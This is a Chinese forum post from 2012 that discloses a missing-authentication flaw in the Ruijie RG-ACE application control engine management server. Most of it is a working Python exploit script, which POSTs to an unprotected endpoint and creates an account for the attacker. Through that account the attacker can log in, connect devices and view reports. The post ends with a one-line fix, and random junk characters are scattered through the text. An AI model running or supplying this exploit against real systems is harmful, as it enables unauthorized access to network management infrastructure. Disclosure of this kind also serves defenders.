找回密码
 立即注册
查看: 2593|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)2 ^* U9 X" q( t: n% m
! T, Q' n" m2 [' `
! I1 j: q* f( E) u1 b7 V+ n
测试的具体版本是
& y7 v& r& \' ]. t* F产品名称: 锐捷应用控制引擎5 ]7 N) G6 F" z$ ?+ L* m
版本号: 3.1.36.001 TC
0 }; T  U% x* H* K2 i编译时间: 201104291730, ]. |! P* I1 F% K) Z, }
, `* E% ~$ ?/ C3 m6 c6 q" \& k

' d7 ?) L; ]1 J- Q漏洞证明:
9 x' n8 U9 g- \8 G
% v. C: c' o+ y8 ~0 N; d- `& ]$ o) ]6 z( E, c# }
' D: p% J) ?' m% U1 }8 C" D
& x8 A* _$ |+ b

9 m! y, C6 }0 g+ u' o$ F; }  W
5 K- K' {; s- U. R执行脚本) Q, i) N$ B, v! Q; P( G
#! /usr/bin/env python
. e( m  d- @, q# R#coding=gbk# i' I5 T1 W) e" U
#RG-ACE管理服务器 V3.1.36.001" m+ e; |. ?  E$ H6 W; e# T6 E. ?
import urllib2, urllib,cookielib  w# J) J1 z7 _  T' [
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP! v8 A( Z6 l! u) H
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
/ Z: d$ c, p4 P6 b$ [2 ?0 H& o7 dopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]/ m: Y9 V4 g9 r+ M. z
post=(("event","userManager.doInsertUserInfo"),! l, v. a& r% s4 i+ y* p
("useractionname","addButtonValue"),
3 V8 [" n( A& D$ Q% f. I; }("useropermanager","userManager"),# y( Y9 y( H( e3 P# Y
("userName","t"), #######账号自己加9 B  K- [  ~0 M3 h% R
("pwd","aaaaaa"),######密码自己加
$ c+ a" H+ y- m! |6 ?/ }("trueName","ad")," i3 _, a( b5 {7 G: K! E
("email",""),! w& z4 U, [' |6 @) ~6 r
("mobilePhone",""),' d% R$ H" k, f
("officePhone",""),
& D! u& z- V  ^; j- v# R- z8 S, \("addr",""),
+ F) F9 k; ]$ ]: b( H$ D("submit","确定"))
# R; C2 g2 p& B" X3 {+ qurllib2.install_opener(opener)9 S! ~3 S# W4 f6 V  N. ]( Z
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
8 y0 u) P5 a' Y. \5 Rprint "Done"
& A! }6 K9 b/ K6 x  g! M2 E
* {: B4 ^  _- P- U  v2 w登录,连接设备
+ z; z' Y/ D( ?$ M3 }1 C- y/ i+ j
/ _* L& O% N( r* @  A+ T5 Z5 N" ~$ M
+ u/ U1 t  L6 ^
# w5 |9 X/ R' G) q' g! Q) ]3 Q

, }0 w  I; Z3 z& ?, ?/ ~5 S4 }默认的管理员admin权限更大点8 |7 t/ Z3 ?( a2 S
7 F" T7 ^! x1 s4 g4 _1 g& h
; ]0 g$ y2 M/ Z  q2 c4 G  ]
; v+ D; r; D. E
. s, A; w' V0 w1 P  k& Z+ F4 J

! [8 J* g  _( y0 U& g0 M3 G1 N6 {修复方案:
$ U: I% d6 i: ]$ S) I, }4 [; o加强对接口的权限验证+ g! ^2 d  y/ Y- M, O3 X  G
' ~# D: |9 V2 ]0 W! @
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表